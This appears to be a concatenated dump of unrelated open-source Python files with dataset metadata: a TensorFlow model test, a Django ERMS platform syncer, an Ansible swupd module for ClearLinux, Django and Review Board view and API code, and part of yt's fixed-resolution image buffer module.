input_y: y_onehot,
dropout_keep_prob: 1.0,
alpha: args.alpha,
is_training: False
}
batch_global_scores, batch_first_scores, batch_second_scores, batch_third_scores, batch_fourth_scores = \
sess.run([scores, first_scores, second_scores, third_scores, fourth_scores], feed_dict)
batch_scores = [batch_global_scores, batch_first_scores, batch_second_scores,
batch_third_scores, batch_fourth_scores]
batch_predicted_labels_ts, batch_predicted_scores_ts = \
dh.get_label_threshold(scores=batch_scores[0], threshold=args.threshold)
for labels in y:
true_labels.append(labels)
for labels in batch_predicted_labels_ts:
predicted_labels.append(labels)
for values in batch_predicted_scores_ts:
predicted_scores.append(values)
for index in range(len(predicted_onehot_scores)):
for onehot_labels in y_batch_test_list[index]:
true_onehot_labels[index].append(onehot_labels)
for onehot_scores in batch_scores[index]:
predicted_onehot_scores[index].append(onehot_scores)
predicted_onehot_labels_ts = \
dh.get_onehot_label_threshold(scores=batch_scores[index], threshold=args.threshold)
for onehot_labels in predicted_onehot_labels_ts:
predicted_onehot_labels[index].append(onehot_labels)
for index in range(len(predicted_onehot_scores)):
test_pre = precision_score(y_true=np.array(true_onehot_labels[index]),
y_pred=np.array(predicted_onehot_labels[index]), average='micro')
test_rec = recall_score(y_true=np.array(true_onehot_labels[index]),
y_pred=np.array(predicted_onehot_labels[index]), average='micro')
test_F1 = f1_score(y_true=np.array(true_onehot_labels[index]),
y_pred=np.array(predicted_onehot_labels[index]), average='micro')
test_auc = roc_auc_score(y_true=np.array(true_onehot_labels[index]),
y_score=np.array(predicted_onehot_scores[index]), average='micro')
test_prc = average_precision_score(y_true=np.array(true_onehot_labels[index]),
y_score=np.array(predicted_onehot_scores[index]), average="micro")
if index == 0:
logger.info("[Global] Predict by threshold: Precision {0:g}, Recall {1:g}, "
"F1 {2:g}, AUC {3:g}, AUPRC {4:g}"
.format(test_pre, test_rec, test_F1, test_auc, test_prc))
else:
logger.info("[Local] Predict by threshold in Level-{0}: Precision {1:g}, Recall {2:g}, "
"F1 {3:g}, AUPRC {4:g}".format(index, test_pre, test_rec, test_F1, test_prc))
if not os.path.exists(SAVE_DIR):
os.makedirs(SAVE_DIR)
dh.create_prediction_file(output_file=SAVE_DIR + "/predictions.json", data_id=test_data['id'],
true_labels=true_labels, predict_labels=predicted_labels,
predict_scores=predicted_scores)
logger.info("All Done.")
if __name__ == '__main__':
test_harnn()
| true | true |
1c30639ec356fd7364c53bd692139438c10f7447 | 1,322 | py | Python | apps/publications/logic/sync.py | remocrevo/celus | 682b13168eb475d7f970502113e756e40a899877 | [
"MIT"
] | null | null | null | apps/publications/logic/sync.py | remocrevo/celus | 682b13168eb475d7f970502113e756e40a899877 | [
"MIT"
] | null | null | null | apps/publications/logic/sync.py | remocrevo/celus | 682b13168eb475d7f970502113e756e40a899877 | [
"MIT"
] | null | null | null | """
Stuff related to synchronization of organization data between the local database
and an external source
"""
from core.task_support import cache_based_lock
from erms.sync import ERMSObjectSyncer
from ..models import Platform
from django.db.transaction import atomic
from django.conf import settings
from core.models import DataSource
from erms.api import ERMS
class PlatformSyncer(ERMSObjectSyncer):
    """Syncer that maps ERMS platform records onto local ``Platform`` objects."""

    # Maps ERMS attribute names (keys) to Platform model field names (values).
    # Several ERMS variants intentionally collapse onto the same local field.
    attr_map = {
        'id': 'ext_id',
        'short name': 'short_name',
        'short_name_en': 'short_name',  # short name is not translatable
        'short_name_cs': 'short_name',
        'provider': 'provider',
        'provider_en': 'provider_en',
        'provider_cs': 'provider_cs',
        'name': 'name',
        'name_en': 'name_en',
        'name_cs': 'name_cs',
        'url': 'url',
    }
    # Model class the base syncer should create/update.
    object_class = Platform
@atomic()
def erms_sync_platforms() -> dict:
    """Synchronize Platform records from the ERMS API into the local database.

    Runs inside a single DB transaction and under a cache-based lock so that
    concurrent sync tasks cannot interleave.  Returns the dict produced by
    ``PlatformSyncer.sync_data`` (presumably sync statistics — confirm with
    the ERMSObjectSyncer implementation).
    """
    with cache_based_lock('erms_sync_platforms'):
        erms = ERMS(base_url=settings.ERMS_API_URL)
        erms_records = erms.fetch_objects(ERMS.CLS_PLATFORM)
        # All ERMS-synced platforms are attributed to one shared API-type
        # data source, created lazily on first sync.
        data_source, _created = DataSource.objects.get_or_create(short_name='ERMS',
                                                                 type=DataSource.TYPE_API)
        syncer = PlatformSyncer(data_source)
        return syncer.sync_data(erms_records)
| 30.045455 | 90 | 0.656581 | from core.task_support import cache_based_lock
from erms.sync import ERMSObjectSyncer
from ..models import Platform
from django.db.transaction import atomic
from django.conf import settings
from core.models import DataSource
from erms.api import ERMS
class PlatformSyncer(ERMSObjectSyncer):
attr_map = {
'id': 'ext_id',
'short name': 'short_name',
'short_name_en': 'short_name',
'short_name_cs': 'short_name',
'provider': 'provider',
'provider_en': 'provider_en',
'provider_cs': 'provider_cs',
'name': 'name',
'name_en': 'name_en',
'name_cs': 'name_cs',
'url': 'url',
}
object_class = Platform
@atomic()
def erms_sync_platforms() -> dict:
with cache_based_lock('erms_sync_platforms'):
erms = ERMS(base_url=settings.ERMS_API_URL)
erms_records = erms.fetch_objects(ERMS.CLS_PLATFORM)
data_source, _created = DataSource.objects.get_or_create(short_name='ERMS',
type=DataSource.TYPE_API)
syncer = PlatformSyncer(data_source)
return syncer.sync_data(erms_records)
| true | true |
1c3063ff282f493486da891b43dde3f1edcd3ccd | 8,726 | py | Python | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/swupd.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/swupd.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | exercises/networking_selfpaced/networking-workshop/collections/ansible_collections/community/general/plugins/modules/swupd.py | tr3ck3r/linklight | 5060f624c235ecf46cb62cefcc6bddc6bf8ca3e7 | [
"MIT"
] | null | null | null | #!/usr/bin/python
# (c) 2017, Alberto Murillo <alberto.murillo.silva@intel.com>
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: swupd
short_description: Manages updates and bundles in ClearLinux systems.
description:
- Manages updates and bundles with the swupd bundle manager, which is used by the
Clear Linux Project for Intel Architecture.
author: Alberto Murillo (@albertomurillo)
options:
contenturl:
description:
- URL pointing to the contents of available bundles.
If not specified, the contents are retrieved from clearlinux.org.
format:
description:
- The format suffix for version file downloads. For example [1,2,3,staging,etc].
If not specified, the default format is used.
manifest:
description:
- The manifest contains information about the bundles at certain version of the OS.
Specify a Manifest version to verify against that version or leave unspecified to
verify against the current version.
aliases: [release, version]
name:
description:
- Name of the (I)bundle to install or remove.
aliases: [bundle]
state:
description:
- Indicates the desired (I)bundle state. C(present) ensures the bundle
is installed while C(absent) ensures the (I)bundle is not installed.
default: present
choices: [present, absent]
update:
description:
- Updates the OS to the latest version.
type: bool
url:
description:
- Overrides both I(contenturl) and I(versionurl).
verify:
description:
- Verify content for OS version.
type: bool
versionurl:
description:
- URL for version string download.
'''
EXAMPLES = '''
- name: Update the OS to the latest version
swupd:
update: yes
- name: Installs the "foo" bundle
swupd:
name: foo
state: present
- name: Removes the "foo" bundle
swupd:
name: foo
state: absent
- name: Check integrity of filesystem
swupd:
verify: yes
- name: Downgrade OS to release 12920
swupd:
verify: yes
manifest: 12920
'''
RETURN = '''
stdout:
description: stdout of swupd
returned: always
type: str
stderr:
description: stderr of swupd
returned: always
type: str
'''
import os
from ansible.module_utils.basic import AnsibleModule
class Swupd(object):
    """Thin wrapper around the ``swupd`` CLI implementing the module actions.

    Each action records its outcome in ``changed``/``failed``/``msg``/``rc``/
    ``stdout``/``stderr`` so ``main()`` can report the result to Ansible.
    """

    # Marker strings printed by `swupd verify`; used to interpret its output.
    FILES_NOT_MATCH = "files did not match"
    FILES_REPLACED = "missing files were replaced"
    FILES_FIXED = "files were fixed"
    FILES_DELETED = "files were deleted"

    def __init__(self, module):
        """Locate the swupd binary and copy the module parameters onto self."""
        # Fail if swupd is not found
        self.module = module
        self.swupd_cmd = module.get_bin_path("swupd", False)

        if not self.swupd_cmd:
            module.fail_json(msg="Could not find swupd.")

        # Initialize parameters (contenturl, format, manifest, name, ...)
        # as attributes so _get_cmd() can read them directly.
        for key in module.params.keys():
            setattr(self, key, module.params[key])

        # Initialize return values
        self.changed = False
        self.failed = False
        self.msg = None
        self.rc = None
        self.stderr = ""
        self.stdout = ""

    def _run_cmd(self, cmd):
        """Run *cmd* and record rc/stdout/stderr on self."""
        self.rc, self.stdout, self.stderr = self.module.run_command(cmd, check_rc=False)

    def _get_cmd(self, command):
        """Build the full swupd command line for *command*.

        ``--url`` overrides both ``--contenturl`` and ``--versionurl``;
        the content URL does not apply to ``check-update``.
        """
        cmd = "%s %s" % (self.swupd_cmd, command)

        if self.format:
            cmd += " --format=%s" % self.format
        if self.manifest:
            cmd += " --manifest=%s" % self.manifest
        if self.url:
            cmd += " --url=%s" % self.url
        else:
            if self.contenturl and command != "check-update":
                cmd += " --contenturl=%s" % self.contenturl
            if self.versionurl:
                cmd += " --versionurl=%s" % self.versionurl

        return cmd

    def _is_bundle_installed(self, bundle):
        """Return True if *bundle*'s tracking file exists on disk."""
        try:
            os.stat("/usr/share/clear/bundles/%s" % bundle)
        except OSError:
            return False

        return True

    def _needs_update(self):
        """Return True if an OS update is available, False if up to date.

        Any other exit code flags failure and returns None (falsy).
        """
        cmd = self._get_cmd("check-update")
        self._run_cmd(cmd)

        if self.rc == 0:
            return True
        if self.rc == 1:
            return False

        self.failed = True
        self.msg = "Failed to check for updates"

    def _needs_verify(self):
        """Return True if `swupd verify` reports mismatched files."""
        cmd = self._get_cmd("verify")
        self._run_cmd(cmd)

        if self.rc != 0:
            self.failed = True
            self.msg = "Failed to check for filesystem inconsistencies."

        if self.FILES_NOT_MATCH in self.stdout:
            return True
        return False

    def install_bundle(self, bundle):
        """Installs a bundle with `swupd bundle-add bundle`"""
        if self.module.check_mode:
            self.module.exit_json(changed=not self._is_bundle_installed(bundle))

        if self._is_bundle_installed(bundle):
            self.msg = "Bundle %s is already installed" % bundle
            return

        cmd = self._get_cmd("bundle-add %s" % bundle)
        self._run_cmd(cmd)

        if self.rc == 0:
            self.changed = True
            self.msg = "Bundle %s installed" % bundle
            return

        self.failed = True
        self.msg = "Failed to install bundle %s" % bundle

    def remove_bundle(self, bundle):
        """Removes a bundle with `swupd bundle-remove bundle`"""
        if self.module.check_mode:
            self.module.exit_json(changed=self._is_bundle_installed(bundle))

        if not self._is_bundle_installed(bundle):
            # BUGFIX: the '%s' placeholder was previously never interpolated.
            self.msg = "Bundle %s not installed" % bundle
            return

        cmd = self._get_cmd("bundle-remove %s" % bundle)
        self._run_cmd(cmd)

        if self.rc == 0:
            self.changed = True
            self.msg = "Bundle %s removed" % bundle
            return

        self.failed = True
        self.msg = "Failed to remove bundle %s" % bundle

    def update_os(self):
        """Updates the os with `swupd update`"""
        if self.module.check_mode:
            self.module.exit_json(changed=self._needs_update())

        if not self._needs_update():
            # If the check itself failed, keep its error message instead of
            # overwriting it with "no updates available".
            if self.failed:
                return
            self.msg = "There are no updates available"
            return

        cmd = self._get_cmd("update")
        self._run_cmd(cmd)

        if self.rc == 0:
            self.changed = True
            self.msg = "Update successful"
            return

        self.failed = True
        # BUGFIX: previously reported "Failed to check for updates" here,
        # although it is the update command itself that failed.
        self.msg = "Failed to update the OS"

    def verify_os(self):
        """Verifies filesystem against specified or current version"""
        if self.module.check_mode:
            self.module.exit_json(changed=self._needs_verify())

        if not self._needs_verify():
            # If the verify check itself failed, keep its error message.
            if self.failed:
                return
            # BUGFIX: typo "where" -> "were".
            self.msg = "No files were changed"
            return

        cmd = self._get_cmd("verify --fix")
        self._run_cmd(cmd)

        if self.rc == 0 and (self.FILES_REPLACED in self.stdout or self.FILES_FIXED in self.stdout or self.FILES_DELETED in self.stdout):
            self.changed = True
            self.msg = "Fix successful"
            return

        self.failed = True
        self.msg = "Failed to verify the OS"
def main():
    """Module entry point: parse arguments, dispatch the action, report back.

    Exactly one of ``name``/``update``/``verify`` must be supplied (enforced
    by required_one_of/mutually_exclusive).  Results are returned via
    ``exit_json``/``fail_json`` with swupd's stdout/stderr attached.
    """
    module = AnsibleModule(
        argument_spec=dict(
            contenturl=dict(type="str"),
            format=dict(type="str"),
            manifest=dict(aliases=["release", "version"], type="int"),
            name=dict(aliases=["bundle"], type="str"),
            state=dict(default="present", choices=["present", "absent"], type="str"),
            update=dict(default=False, type="bool"),
            url=dict(type="str"),
            verify=dict(default=False, type="bool"),
            versionurl=dict(type="str"),
        ),
        required_one_of=[["name", "update", "verify"]],
        mutually_exclusive=[["name", "update", "verify"]],
        supports_check_mode=True
    )

    swupd = Swupd(module)

    name = module.params["name"]
    state = module.params["state"]
    update = module.params["update"]
    verify = module.params["verify"]

    # Dispatch: OS update and verify take precedence over bundle management.
    if update:
        swupd.update_os()
    elif verify:
        swupd.verify_os()
    elif state == "present":
        swupd.install_bundle(name)
    elif state == "absent":
        swupd.remove_bundle(name)
    else:
        swupd.failed = True

    if swupd.failed:
        module.fail_json(msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
    else:
        module.exit_json(changed=swupd.changed, msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
# Module entry point when executed by Ansible (or directly).
if __name__ == '__main__':
    main()
| 28.148387 | 137 | 0.605547 |
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: swupd
short_description: Manages updates and bundles in ClearLinux systems.
description:
- Manages updates and bundles with the swupd bundle manager, which is used by the
Clear Linux Project for Intel Architecture.
author: Alberto Murillo (@albertomurillo)
options:
contenturl:
description:
- URL pointing to the contents of available bundles.
If not specified, the contents are retrieved from clearlinux.org.
format:
description:
- The format suffix for version file downloads. For example [1,2,3,staging,etc].
If not specified, the default format is used.
manifest:
description:
- The manifest contains information about the bundles at certain version of the OS.
Specify a Manifest version to verify against that version or leave unspecified to
verify against the current version.
aliases: [release, version]
name:
description:
- Name of the (I)bundle to install or remove.
aliases: [bundle]
state:
description:
- Indicates the desired (I)bundle state. C(present) ensures the bundle
is installed while C(absent) ensures the (I)bundle is not installed.
default: present
choices: [present, absent]
update:
description:
- Updates the OS to the latest version.
type: bool
url:
description:
- Overrides both I(contenturl) and I(versionurl).
verify:
description:
- Verify content for OS version.
type: bool
versionurl:
description:
- URL for version string download.
'''
EXAMPLES = '''
- name: Update the OS to the latest version
swupd:
update: yes
- name: Installs the "foo" bundle
swupd:
name: foo
state: present
- name: Removes the "foo" bundle
swupd:
name: foo
state: absent
- name: Check integrity of filesystem
swupd:
verify: yes
- name: Downgrade OS to release 12920
swupd:
verify: yes
manifest: 12920
'''
RETURN = '''
stdout:
description: stdout of swupd
returned: always
type: str
stderr:
description: stderr of swupd
returned: always
type: str
'''
import os
from ansible.module_utils.basic import AnsibleModule
class Swupd(object):
FILES_NOT_MATCH = "files did not match"
FILES_REPLACED = "missing files were replaced"
FILES_FIXED = "files were fixed"
FILES_DELETED = "files were deleted"
def __init__(self, module):
self.module = module
self.swupd_cmd = module.get_bin_path("swupd", False)
if not self.swupd_cmd:
module.fail_json(msg="Could not find swupd.")
for key in module.params.keys():
setattr(self, key, module.params[key])
self.changed = False
self.failed = False
self.msg = None
self.rc = None
self.stderr = ""
self.stdout = ""
def _run_cmd(self, cmd):
self.rc, self.stdout, self.stderr = self.module.run_command(cmd, check_rc=False)
def _get_cmd(self, command):
cmd = "%s %s" % (self.swupd_cmd, command)
if self.format:
cmd += " --format=%s" % self.format
if self.manifest:
cmd += " --manifest=%s" % self.manifest
if self.url:
cmd += " --url=%s" % self.url
else:
if self.contenturl and command != "check-update":
cmd += " --contenturl=%s" % self.contenturl
if self.versionurl:
cmd += " --versionurl=%s" % self.versionurl
return cmd
def _is_bundle_installed(self, bundle):
try:
os.stat("/usr/share/clear/bundles/%s" % bundle)
except OSError:
return False
return True
def _needs_update(self):
cmd = self._get_cmd("check-update")
self._run_cmd(cmd)
if self.rc == 0:
return True
if self.rc == 1:
return False
self.failed = True
self.msg = "Failed to check for updates"
def _needs_verify(self):
cmd = self._get_cmd("verify")
self._run_cmd(cmd)
if self.rc != 0:
self.failed = True
self.msg = "Failed to check for filesystem inconsistencies."
if self.FILES_NOT_MATCH in self.stdout:
return True
return False
def install_bundle(self, bundle):
if self.module.check_mode:
self.module.exit_json(changed=not self._is_bundle_installed(bundle))
if self._is_bundle_installed(bundle):
self.msg = "Bundle %s is already installed" % bundle
return
cmd = self._get_cmd("bundle-add %s" % bundle)
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Bundle %s installed" % bundle
return
self.failed = True
self.msg = "Failed to install bundle %s" % bundle
def remove_bundle(self, bundle):
if self.module.check_mode:
self.module.exit_json(changed=self._is_bundle_installed(bundle))
if not self._is_bundle_installed(bundle):
self.msg = "Bundle %s not installed"
return
cmd = self._get_cmd("bundle-remove %s" % bundle)
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Bundle %s removed" % bundle
return
self.failed = True
self.msg = "Failed to remove bundle %s" % bundle
def update_os(self):
if self.module.check_mode:
self.module.exit_json(changed=self._needs_update())
if not self._needs_update():
self.msg = "There are no updates available"
return
cmd = self._get_cmd("update")
self._run_cmd(cmd)
if self.rc == 0:
self.changed = True
self.msg = "Update successful"
return
self.failed = True
self.msg = "Failed to check for updates"
def verify_os(self):
if self.module.check_mode:
self.module.exit_json(changed=self._needs_verify())
if not self._needs_verify():
self.msg = "No files where changed"
return
cmd = self._get_cmd("verify --fix")
self._run_cmd(cmd)
if self.rc == 0 and (self.FILES_REPLACED in self.stdout or self.FILES_FIXED in self.stdout or self.FILES_DELETED in self.stdout):
self.changed = True
self.msg = "Fix successful"
return
self.failed = True
self.msg = "Failed to verify the OS"
def main():
module = AnsibleModule(
argument_spec=dict(
contenturl=dict(type="str"),
format=dict(type="str"),
manifest=dict(aliases=["release", "version"], type="int"),
name=dict(aliases=["bundle"], type="str"),
state=dict(default="present", choices=["present", "absent"], type="str"),
update=dict(default=False, type="bool"),
url=dict(type="str"),
verify=dict(default=False, type="bool"),
versionurl=dict(type="str"),
),
required_one_of=[["name", "update", "verify"]],
mutually_exclusive=[["name", "update", "verify"]],
supports_check_mode=True
)
swupd = Swupd(module)
name = module.params["name"]
state = module.params["state"]
update = module.params["update"]
verify = module.params["verify"]
if update:
swupd.update_os()
elif verify:
swupd.verify_os()
elif state == "present":
swupd.install_bundle(name)
elif state == "absent":
swupd.remove_bundle(name)
else:
swupd.failed = True
if swupd.failed:
module.fail_json(msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
else:
module.exit_json(changed=swupd.changed, msg=swupd.msg, stdout=swupd.stdout, stderr=swupd.stderr)
if __name__ == '__main__':
main()
| true | true |
1c3064a56dc4cd358db290b5dbff8c3e63727911 | 359 | py | Python | {{cookiecutter.project_slug}}/apps/client/views.py | Nomadicode/django-cookie | 63bce1225d481d5cd6c6f2b1e1bbb6d47a3c5dab | [
"BSD-3-Clause"
] | 3 | 2020-10-10T20:08:08.000Z | 2021-03-26T05:46:25.000Z | {{cookiecutter.project_slug}}/apps/client/views.py | yunior22/django-cookie | a879f8f0388ad4e7bf4950f73f7423652b3d71c6 | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/apps/client/views.py | yunior22/django-cookie | a879f8f0388ad4e7bf4950f73f7423652b3d71c6 | [
"BSD-3-Clause"
] | 1 | 2021-11-19T21:25:45.000Z | 2021-11-19T21:25:45.000Z | from django.shortcuts import render
template = 'index.html'
# Serve the single-page-app entry template (index.html) for the site root;
# the client-side router takes over once the page has loaded.
def root_path(request):
    return render(request, template)
def vue_router(request):
    """Serve the SPA entry template for any Vue-handled route.

    The requested URL is resolved client-side by the Vue router; the server
    always returns the same index template with an empty context.
    """
    return render(request, template, {})
| 21.117647 | 45 | 0.735376 | from django.shortcuts import render
template = 'index.html'
def root_path(request):
return render(request, template)
def vue_router(request):
context = {}
return render(request, template, context)
| true | true |
1c3064c4cf5ebab2d83d1eb92d2137f66e2a6a89 | 22 | py | Python | mlvtk/base/normalize/__init__.py | tm-schwartz/mlvtk | 58db322d763b4572f1d5c52d81ba854a317bbd8c | [
"MIT"
] | 6 | 2021-01-11T20:10:28.000Z | 2022-03-31T03:02:18.000Z | mlvtk/base/normalize/__init__.py | tm-schwartz/mlvtk | 58db322d763b4572f1d5c52d81ba854a317bbd8c | [
"MIT"
] | 1 | 2020-10-23T06:11:23.000Z | 2020-10-23T06:11:23.000Z | mlvtk/base/normalize/__init__.py | tm-schwartz/mlvtk | 58db322d763b4572f1d5c52d81ba854a317bbd8c | [
"MIT"
] | 1 | 2021-06-20T07:27:47.000Z | 2021-06-20T07:27:47.000Z | from .. import Vmodel
| 11 | 21 | 0.727273 | from .. import Vmodel
| true | true |
1c3065efe5b88fa013826b85d95896ad96c68051 | 1,193 | py | Python | reviewboard/webapi/resources/draft_patched_file.py | znick/reviewboard | f32320b267efcdf2feff1661eabe57f99ef490a7 | [
"MIT"
] | null | null | null | reviewboard/webapi/resources/draft_patched_file.py | znick/reviewboard | f32320b267efcdf2feff1661eabe57f99ef490a7 | [
"MIT"
] | null | null | null | reviewboard/webapi/resources/draft_patched_file.py | znick/reviewboard | f32320b267efcdf2feff1661eabe57f99ef490a7 | [
"MIT"
] | 1 | 2021-11-23T15:25:44.000Z | 2021-11-23T15:25:44.000Z | from __future__ import unicode_literals
from django.core.exceptions import ObjectDoesNotExist
from djblets.webapi.errors import DOES_NOT_EXIST
from reviewboard.webapi.resources import resources
from reviewboard.webapi.resources.base_patched_file import \
BasePatchedFileResource
class DraftPatchedFileResource(BasePatchedFileResource):
"""Provides the patched file corresponding to a draft file diff."""
name = 'draft_patched_file'
def get_filediff(self, request, *args, **kwargs):
"""Returns the FileDiff, or an error, for the given parameters."""
draft_resource = resources.review_request_draft
try:
draft = draft_resource.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
if not draft_resource.has_access_permissions(request, draft):
return self._no_access_error(request.user)
try:
return resources.draft_filediff.get_object(request, *args,
**kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
draft_patched_file_resource = DraftPatchedFileResource()
| 34.085714 | 74 | 0.701593 | from __future__ import unicode_literals
from django.core.exceptions import ObjectDoesNotExist
from djblets.webapi.errors import DOES_NOT_EXIST
from reviewboard.webapi.resources import resources
from reviewboard.webapi.resources.base_patched_file import \
BasePatchedFileResource
class DraftPatchedFileResource(BasePatchedFileResource):
name = 'draft_patched_file'
def get_filediff(self, request, *args, **kwargs):
draft_resource = resources.review_request_draft
try:
draft = draft_resource.get_object(request, *args, **kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
if not draft_resource.has_access_permissions(request, draft):
return self._no_access_error(request.user)
try:
return resources.draft_filediff.get_object(request, *args,
**kwargs)
except ObjectDoesNotExist:
return DOES_NOT_EXIST
draft_patched_file_resource = DraftPatchedFileResource()
| true | true |
1c3066d4fe4cc6d899f83ad1bb9ca88f7ed8259c | 26,729 | py | Python | yt/visualization/fixed_resolution.py | bkhamesra/yt-EinsteinToolkit | 576bf88b5cd706fd577c513c23b1db07ec5f4cd2 | [
"BSD-3-Clause-Clear"
] | 1 | 2021-11-29T21:59:06.000Z | 2021-11-29T21:59:06.000Z | yt/visualization/fixed_resolution.py | bkhamesra/yt-EinsteinToolkit | 576bf88b5cd706fd577c513c23b1db07ec5f4cd2 | [
"BSD-3-Clause-Clear"
] | null | null | null | yt/visualization/fixed_resolution.py | bkhamesra/yt-EinsteinToolkit | 576bf88b5cd706fd577c513c23b1db07ec5f4cd2 | [
"BSD-3-Clause-Clear"
] | null | null | null | """
Fixed resolution buffer support, along with a primitive image analysis tool.
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2013, yt Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
from yt.frontends.ytdata.utilities import \
save_as_dataset
from yt.funcs import \
get_output_filename, \
mylog, \
ensure_list
from .volume_rendering.api import off_axis_projection
from .fixed_resolution_filters import apply_filter, filter_registry
from yt.data_objects.image_array import ImageArray
from yt.utilities.lib.pixelization_routines import \
pixelize_cylinder, pixelize_off_axis_cartesian
from yt.utilities.lib.api import add_points_to_greyscale_image
from yt.frontends.stream.api import load_uniform_grid
import numpy as np
import weakref
import re
import types
class FixedResolutionBuffer(object):
    r"""
    FixedResolutionBuffer(data_source, bounds, buff_size, antialias = True)

    This accepts a 2D data object, such as a Projection or Slice, and
    implements a protocol for generating a pixelized, fixed-resolution
    image buffer.

    yt stores 2D AMR data internally as a set of 2D coordinates and the
    half-width of individual pixels.  Converting this to an image buffer
    requires a deposition step, where individual variable-resolution pixels
    are deposited into a buffer of some resolution, to create an image.
    This object is an interface to that pixelization step: it can deposit
    multiple fields.  It acts as a standard YTDataContainer object, such
    that dict-style access returns an image of a given field.

    Parameters
    ----------
    data_source : :class:`yt.data_objects.construction_data_containers.YTQuadTreeProj` or :class:`yt.data_objects.selection_data_containers.YTSlice`
        This is the source to be pixelized, which can be a projection or a
        slice.  (For cutting planes, see
        `yt.visualization.fixed_resolution.ObliqueFixedResolutionBuffer`.)
    bounds : sequence of floats
        Bounds are the min and max in the image plane that we want our
        image to cover.  It's in the order of (xmin, xmax, ymin, ymax),
        where the coordinates are all in the appropriate code units.
    buff_size : sequence of ints
        The size of the image to generate.
    antialias : boolean
        This can be true or false.  It determines whether or not sub-pixel
        rendering is used during data deposition.
    periodic : boolean
        This can be true or false, and governs whether the pixelization
        will span the domain boundaries.

    See Also
    --------
    :class:`yt.visualization.fixed_resolution.ObliqueFixedResolutionBuffer` :
        A similar object, used for cutting planes.

    Examples
    --------
    To make a projection and then several images, you can generate a
    single FRB and then access multiple fields:

    >>> proj = ds.proj(0, "density")
    >>> frb1 = FixedResolutionBuffer(proj, (0.2, 0.3, 0.4, 0.5),
    ...                 (1024, 1024))
    >>> print frb1["density"].max()
    1.0914e-9 g/cm**3
    >>> print frb1["temperature"].max()
    104923.1 K
    """
    # Fields that are coordinate bookkeeping, not image data; skipped by
    # _get_data_source_fields.
    _exclude_fields = ('pz','pdz','dx','x','y','z',
                       'r', 'dr', 'phi', 'dphi', 'theta', 'dtheta',
                       ('index','dx'),('index','x'),('index','y'),('index','z'),
                       ('index', 'r'), ('index', 'dr'),
                       ('index', 'phi'), ('index', 'dphi'),
                       ('index', 'theta'), ('index', 'dtheta'))
    def __init__(self, data_source, bounds, buff_size, antialias = True,
                 periodic = False):
        self.data_source = data_source
        self.ds = data_source.ds
        self.bounds = bounds
        self.buff_size = buff_size
        self.antialias = antialias
        self.data = {}          # cache: field name -> pixelized ImageArray
        self._filters = []      # (name, (args, kwargs)) applied in __getitem__
        self.axis = data_source.axis
        self.periodic = periodic

        # Register with the dataset's plot list via a weak proxy so the
        # dataset does not keep this buffer alive.
        ds = getattr(data_source, "ds", None)
        if ds is not None:
            ds.plots.append(weakref.proxy(self))

        # Handle periodicity, just in case.  Precomputes the domain
        # period and edges in the two image-plane axes; axis >= 3 marks
        # non-axis-aligned sources, which have no simple period here.
        if self.data_source.axis < 3:
            DLE = self.ds.domain_left_edge
            DRE = self.ds.domain_right_edge
            DD = float(self.periodic)*(DRE - DLE)
            axis = self.data_source.axis
            xax = self.ds.coordinates.x_axis[axis]
            yax = self.ds.coordinates.y_axis[axis]
            self._period = (DD[xax], DD[yax])
            self._edges = ( (DLE[xax], DRE[xax]), (DLE[yax], DRE[yax]) )

        self.setup_filters()
def keys(self):
    """Return the names of the fields already pixelized and cached."""
    return self.data.keys()

def __delitem__(self, item):
    # Drop the cached image so the field is re-pixelized on next access.
    del self.data[item]

def __getitem__(self, item):
    """Pixelize *item* (caching the result) and return it as an ImageArray."""
    if item in self.data: return self.data[item]
    mylog.info("Making a fixed resolution buffer of (%s) %d by %d" % \
        (item, self.buff_size[0], self.buff_size[1]))
    bounds = []
    for b in self.bounds:
        # Bounds may carry units; the pixelizer wants plain floats in
        # code_length.
        if hasattr(b, "in_units"):
            b = float(b.in_units("code_length"))
        bounds.append(b)
    buff = self.ds.coordinates.pixelize(self.data_source.axis,
        self.data_source, item, bounds, self.buff_size,
        int(self.antialias))

    # Apply user-registered image filters in registration order.
    for name, (args, kwargs) in self._filters:
        buff = filter_registry[name](*args[1:], **kwargs).apply(buff)

    # NOTE(review): self._period / self.periodic (computed in __init__)
    # are not forwarded to pixelize -- pre-existing upstream TODO.
    ia = ImageArray(buff, input_units=self.data_source[item].units,
                    info=self._get_info(item))
    self.data[item] = ia
    return self.data[item]

def __setitem__(self, item, val):
    # Allow callers and subclasses to cache a precomputed image directly.
    self.data[item] = val
def _get_data_source_fields(self):
exclude = self.data_source._key_fields + list(self._exclude_fields)
fields = getattr(self.data_source, "fields", [])
fields += getattr(self.data_source, "field_data", {}).keys()
for f in fields:
if f not in exclude and f[0] not in self.data_source.ds.particle_types:
self[f]
def _is_ion( self, fname ):
p = re.compile("_p[0-9]+_")
result = False
if p.search( fname ) is not None:
result = True
return result
def _ion_to_label( self, fname ):
pnum2rom = {
"0":"I", "1":"II", "2":"III", "3":"IV", "4":"V",
"5":"VI", "6":"VII", "7":"VIII", "8":"IX", "9":"X",
